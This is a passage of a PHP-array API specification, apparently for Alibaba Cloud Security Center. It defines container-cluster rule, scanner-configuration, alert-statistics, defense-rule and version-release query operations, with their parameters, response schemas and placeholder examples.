'format' => 'int64', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"291B49F9-xxx\\",\\n \\"ClusterRuleSummary\\": {\\n \\"InterceptionSwitch\\": 0,\\n \\"CloseRuleCount\\": 1,\\n \\"InterceptionType\\": 0,\\n \\"RuleCount\\": 10,\\n \\"OpenRuleCount\\": 1,\\n \\"SuggestRuleCount\\": 1,\\n \\"InterceptionCount7Day\\": 10\\n }\\n}","type":"json"}]', 'title' => 'GetClusterRuleSummary', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterRuleSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetClusterRuleSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetClusterScannerYaml' => [ 'summary' => 'Queries the scan access configuration of a Kubernetes cluster.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'cd49575861a3044d49c954e4b3911****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'WebhookOpen' => ['description' => 'Indicates whether incremental scanning is enabled. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'example' => 'c7c190a82d9a048be9038d352840f****', 'title' => ''], 'CaCertBase64' => ['description' => 'The CA certificate in Base64 encoding.', 'type' => 'string', 'example' => 'xxx', 'title' => ''], 'TlsKeyBase64' => ['description' => 'The webhook private key in Base64 encoding.', 'type' => 'string', 'example' => 'xxx', 'title' => ''], 'TlsCertBase64' => ['description' => 'The webhook certificate in Base64 encoding.', 'type' => 'string', 'example' => 'xxx', 'title' => ''], 'Image' => ['description' => 'The container image information.', 'type' => 'string', 'example' => 'xxxx-registry.cn-shanghai.cr.aliyuncs.com/default/scanner:v1', 'title' => ''], 'ClusterEnvInfo' => ['description' => 'The cluster environment context.', 'type' => 'string', 'example' => 'xxx', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'View cluster scan component access configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterScannerYaml'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetClusterScannerYaml', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ClusterScannerYaml', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:clusterscanneryaml/${#ClusterId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"WebhookOpen\\": 1,\\n \\"ClusterId\\": \\"c7c190a82d9a048be9038d352840f****\\",\\n \\"CaCertBase64\\": \\"xxx\\",\\n \\"TlsKeyBase64\\": \\"xxx\\",\\n \\"TlsCertBase64\\": \\"xxx\\",\\n \\"Image\\": \\"xxxx-registry.cn-shanghai.cr.aliyuncs.com/default/scanner:v1\\",\\n \\"ClusterEnvInfo\\": \\"xxx\\"\\n}","type":"json"}]', ], 'GetClusterStrategyCount' => [ 'summary' => 'Queries the number of policies in each cluster.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data details.', 'type' => 'array', 'items' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c8ca91e0907d94efaba7fb0827eb9****', 'title' => ''], 'StrategyCount' => ['description' => 'The number of policies.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the request.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '796348B5-115C-5BFB-83EA-B5C3C12F822F', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the number of policies in each cluster', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterStrategyCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetClusterStrategyCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"ClusterId\\": \\"c8ca91e0907d94efaba7fb0827eb9****\\",\\n \\"StrategyCount\\": 10\\n }\\n ],\\n \\"Count\\": 3,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"RequestId\\": \\"796348B5-115C-5BFB-83EA-B5C3C12F822F\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'GetClusterSuspEventStatistics' => [ 'summary' => 'Retrieves statistics on container security events.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster that you want to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c6094b964bfc145fe9e418c869e7e****', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source of the request. Set this parameter to sas.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'SuspStatistics' => [ 'description' => 'The number of alerts by severity level.', 'type' => 'object', 'properties' => [ 'Serious' => ['description' => 'The number of alerts with the urgent severity level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Suspicious' => ['description' => 'The number of alerts with the suspicious severity level.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Remind' => ['description' => 'The number of alerts with the reminder severity level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12BR****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'Service error, please try again later.', 'description' => ''], ], ], 'title' => 'Retrieve container security event statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterSuspEventStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetClusterSuspEventStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"SuspStatistics\\": {\\n \\"Serious\\": 1,\\n \\"Suspicious\\": 2,\\n \\"Remind\\": 1\\n },\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12BR****\\"\\n}","type":"json"}]', ], 'GetCommonSwitchConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the common switch.'."\n" ."\n" .'> You can call the [ListClientUserDefineRules](~~ListClientUserDefineRules~~) or [ListSystemClientRules](~~ListSystemClientRules~~) operation to obtain the switch type from the response parameter SwitchId.'."\n", 'type' => 'string', 'required' => false, 'example' => 'USER-DEFINE-RULE-SWITCH-TYPE_180****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413****', 'title' => ''], 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'TargetSyncStatus' => ['description' => 'The status of the synchronization. Valid values:'."\n" ."\n" .'* **sync**: The modifications are being synchronized.'."\n" .'* **valid**: The modifications has taken effect.'."\n", 'type' => 'string', 'example' => 'valid', 'title' => ''], 'TargetDefault' => ['description' => 'Specifies whether to turn on the switch for newly added servers. Valid values:'."\n" ."\n" .'* **add**: By default, the switch is turned on for newly added servers.'."\n" .'* **del**: By default, the switch is turned off for newly added servers.'."\n", 'type' => 'string', 'example' => 'add', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'GetCommonSwitchConfig', 'summary' => 'Queries the configuration of a common switch.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCommonSwitchConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCommonSwitchConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413****\\",\\n \\"Data\\": {\\n \\"TargetSyncStatus\\": \\"valid\\",\\n \\"TargetDefault\\": \\"add\\"\\n }\\n}","type":"json"}]', ], 'GetConsoleFuncGrayStatus' => [ 'summary' => 'Query whether the core function\'s gray switch is hit', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '185187', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'Condition', 'in' => 'query', 'schema' => ['description' => 'Name of the function module.', 'type' => 'string', 'required' => false, 'example' => 'vpcConsoleSwitch', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Set the language type for request and response messages. Default value: **zh**. Values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'Return result.', 'type' => 'object', 'properties' => [ 'Hit' => ['description' => 'Whether it hits the gray status.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ExcludeApiList' => [ 'description' => 'List of APIs not hit.', 'type' => 'array', 'items' => [ 'description' => 'List of APIs not hit.', 'type' => 'object', 'properties' => [ 'Code' => ['description' => 'Product Code.', 'type' => 'string', 'example' => 'Sas', 'title' => ''], 'Version' => ['description' => 'API version.', 'type' => 'string', 'example' => '2017-11-10', 'title' => ''], 'Action' => ['description' => 'Action corresponding to the API.', 'type' => 'string', 'example' => 'GetAttackTypeList', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of this call request, which is a unique identifier generated by Alibaba Cloud for the request. It can be used to troubleshoot and pinpoint issues.', 'type' => 'string', 'example' => '5DFD6277-CC36-57F7-ACE6-F5952XXXXXXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Hit\\": true,\\n \\"ExcludeApiList\\": [\\n {\\n \\"Code\\": \\"Sas\\",\\n \\"Version\\": \\"2017-11-10\\",\\n \\"Action\\": \\"GetAttackTypeList\\"\\n }\\n ]\\n },\\n \\"RequestId\\": \\"5DFD6277-CC36-57F7-ACE6-F5952XXXXXXXX\\"\\n}","type":"json"}]', 'title' => 'Get the Gray Status of Console Function Modules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '15', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetConsoleFuncGrayStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:GetConsoleFuncGrayStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetContainerDefenseRuleDetail' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], ], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The rule ID.'."\n" .'> You can call the [ListContainerDefenseRule](~~2590599~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '156'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The rule details.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1948', 'title' => ''], 'AliUid' => ['description' => 'The user ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1766185894104***', 'title' => ''], 'EventType' => ['title' => '', 'description' => 'The alerting type. Valid values:'."\n" ."\n" .'- **Container Active Defense**.', 'type' => 'string', 'example' => 'EventType'], 'EventName' => ['title' => '', 'description' => 'The alert name. Valid values:'."\n" ."\n" .'- **Non-image Process Startup**.', 'type' => 'string', 'example' => 'EventName'], 'RuleAction' => ['title' => '', 'description' => 'The rule action. Valid values:'."\n" ."\n" .'- **1**: alert.'."\n" ."\n" .'- **2**: block.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'RuleSwitch' => ['title' => '', 'description' => 'The switch status of the rule. Valid values:'."\n" ."\n" .'- **1**: enabled.'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0'], 'RuleType' => ['title' => '', 'description' => 'The rule type. Valid values:'."\n" .'- **1**: system rule.'."\n" ."\n" .'- **2**: custom rule.', 'type' => 'string', 'example' => '1'], 'RuleName' => ['title' => '', 'description' => 'The rule name.', 'type' => 'string', 'example' => 'test-000'], 'Description' => ['title' => '', 'description' => 'The description.', 'type' => 'string', 'example' => '防御规则。'], 'Whitelist' => [ 'title' => '', 'description' => 'The whitelist.', 'type' => 'object', 'properties' => [ 'Hash' => [ 'description' => 'The list of file hashes.This parameter is not supported..', 'type' => 'array', 'items' => ['description' => 'The file hash.This parameter is not supported..', 'type' => 'string', 'deprecated' => true, 'example' => '0', 'title' => ''], 'deprecated' => true, 'title' => '', 'example' => '', ], 'Path' => [ 'description' => 'The list of file paths added to the whitelist.', 'type' => 'array', 'items' => ['description' => 'The file path added to the whitelist.', 'type' => 'string', 'example' => '/home/workdir/', 'title' => ''], 'title' => '', 'example' => '', ], 'Image' => [ 'description' => 'The list of images added to the whitelist.', 'type' => 'array', 'items' => ['description' => 'The image added to the whitelist.', 'type' => 'string', 'example' => 'sdf:sdf', 'title' => ''], 'title' => '', 'example' => '', ], ], 'example' => '', ], 'Scope' => [ 'title' => '', 'description' => 'The scope in which the rule takes effect.', 'type' => 'array', 'items' => [ 'description' => 'The scope in which the rule takes effect.', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'example' => 'c9bea04*2b25**', 'title' => ''], 'AllNamespace' => ['description' => 'Indicates whether all namespaces are included. Valid values:'."\n" ."\n" .'- **0**: no.'."\n" .'- **1**: yes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Namespaces' => [ 'description' => 'The list of namespaces.', 'type' => 'array', 'items' => ['description' => 'The namespace ID.', 'type' => 'string', 'example' => 'kube-system', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: successful.'."\n" .'- **false**: failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '77546BF4-CCE8-5F8D-B42B-5FD3306B43B4', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code. A value of 200 indicates that the request was successful.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve non-image process defense rule details', 'summary' => 'Retrieves the details of a non-image process defense rule.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetContainerDefenseRuleDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetContainerDefenseRuleDetail', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ContainerDefenseRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:containerdefenserule/{#RuleId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 1948,\\n \\"AliUid\\": 0,\\n \\"EventType\\": \\"EventType\\",\\n \\"EventName\\": \\"EventName\\",\\n \\"RuleAction\\": 1,\\n \\"RuleSwitch\\": 0,\\n \\"RuleType\\": \\"1\\",\\n \\"RuleName\\": \\"test-000\\",\\n \\"Description\\": \\"防御规则。\\",\\n \\"Whitelist\\": {\\n \\"Hash\\": [\\n \\"0\\"\\n ],\\n \\"Path\\": [\\n \\"/home/workdir/\\"\\n ],\\n \\"Image\\": [\\n \\"sdf:sdf\\"\\n ]\\n },\\n \\"Scope\\": [\\n {\\n \\"ClusterId\\": \\"c9bea04*2b25**\\",\\n \\"AllNamespace\\": 1,\\n \\"Namespaces\\": [\\n \\"kube-system\\"\\n ]\\n }\\n ]\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"77546BF4-CCE8-5F8D-B42B-5FD3306B43B4\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'GetCurrentVersionPublish' => [ 'summary' => 'Retrieves the release information of the current client version.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8E67FE', 'title' => ''], 'Data' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'CurVersion' => ['description' => 'The current version.', 'type' => 'string', 'example' => '0.0.8', 'title' => ''], 'UpgradeVersion' => ['description' => 'The target version to upgrade to.', 'type' => 'string', 'example' => '0.0.9', 'title' => ''], 'LatestVersion' => ['description' => 'The latest client version number.', 'type' => 'string', 'example' => '0.0.9', 'title' => ''], 'LatestVersionCreate' => ['description' => 'The timestamp when the latest client version was created.', 'type' => 'integer', 'format' => 'int64', 'example' => '1662639150000', 'title' => ''], 'ForceUpgradeTime' => ['description' => 'The timestamp for the forced client upgrade.', 'type' => 'integer', 'format' => 'int64', 'example' => '1732506308000', 'title' => ''], 'PublishStatus' => ['description' => 'The release status of the current version. Valid values:'."\n" .'- **0**: Not started.'."\n" .'- **1**: Being released.'."\n" .'- **2**: Release completed.'."\n" .'- **3**: Release paused.'."\n" .'- **4**: Forced upgrade in progress.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'GraySwitchStatus' => ['description' => 'Indicates whether the canary release policy is enabled. Valid values:'."\n" .'- **1**: Enabled.'."\n" .'- **0**: Disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'BigCustomer' => ['description' => 'Indicates whether the current user supports custom upgrades in Security Center. Valid values:'."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'LatestVersionDesc' => ['description' => 'The description of the latest version.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'AutoUpgrade' => ['description' => 'Indicates whether automatic upgrade is enabled. Valid values:'."\n" ."\n" .'- **1**: Enabled.'."\n" .'- **0**: Disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve version release information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCurrentVersionPublish', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8E67FE\\",\\n \\"Data\\": {\\n \\"CurVersion\\": \\"0.0.8\\",\\n \\"UpgradeVersion\\": \\"0.0.9\\",\\n \\"LatestVersion\\": \\"0.0.9\\",\\n \\"LatestVersionCreate\\": 1662639150000,\\n \\"ForceUpgradeTime\\": 1732506308000,\\n \\"PublishStatus\\": 1,\\n \\"GraySwitchStatus\\": 1,\\n \\"BigCustomer\\": true,\\n \\"LatestVersionDesc\\": \\"test\\",\\n \\"AutoUpgrade\\": 1\\n }\\n}","type":"json"}]', 'translator' => 'machine', ], 'GetDataTrend' => [ 'summary' => 'Queries the security operations trends for vulnerabilities, alerts, and baselines.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '120889', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'BizTypes', 'in' => 'query', 'schema' => ['description' => 'The type of security data to query. Valid values:'."\n" .'- **HC_NEW**: number of new baseline risks'."\n" .'- **HC_OPERATE**: number of handled baseline risks'."\n" .'- **VUL_NEW**: number of new vulnerability risks'."\n" .'- **VUL_OPERATE**: number of handled vulnerability risks'."\n" .'- **SUSP_NEW**: number of new alert risks'."\n" .'- **SUSP_OPERATE**: number of handled alert risks.', 'type' => 'string', 'required' => true, 'example' => 'HC_NEW,HC_OPERATE', 'title' => ''], ], [ 'name' => 'StartTimestamp', 'in' => 'query', 'schema' => ['description' => 'The start timestamp of the query. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1687334501000', 'title' => ''], ], [ 'name' => 'EndTimestamp', 'in' => 'query', 'schema' => ['description' => 'The end timestamp of the query. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1721923200000', 'title' => ''], ], [ 'name' => 'Interval', 'in' => 'query', 'schema' => ['description' => 'The interval for querying data. Unit: milliseconds.'."\n" ."\n" .'> Minimum value: 1000.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'minimum' => '1000', 'example' => '86400000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'DateList' => [ 'description' => 'The list of statistical timestamps for the trend data.', 'type' => 'array', 'items' => ['description' => 'The statistical timestamp for the trend data. Unit: seconds.', 'type' => 'integer', 'format' => 'int32', 'example' => '1721404800', 'title' => ''], 'title' => '', 'example' => '', ], 'DateStrList' => [ 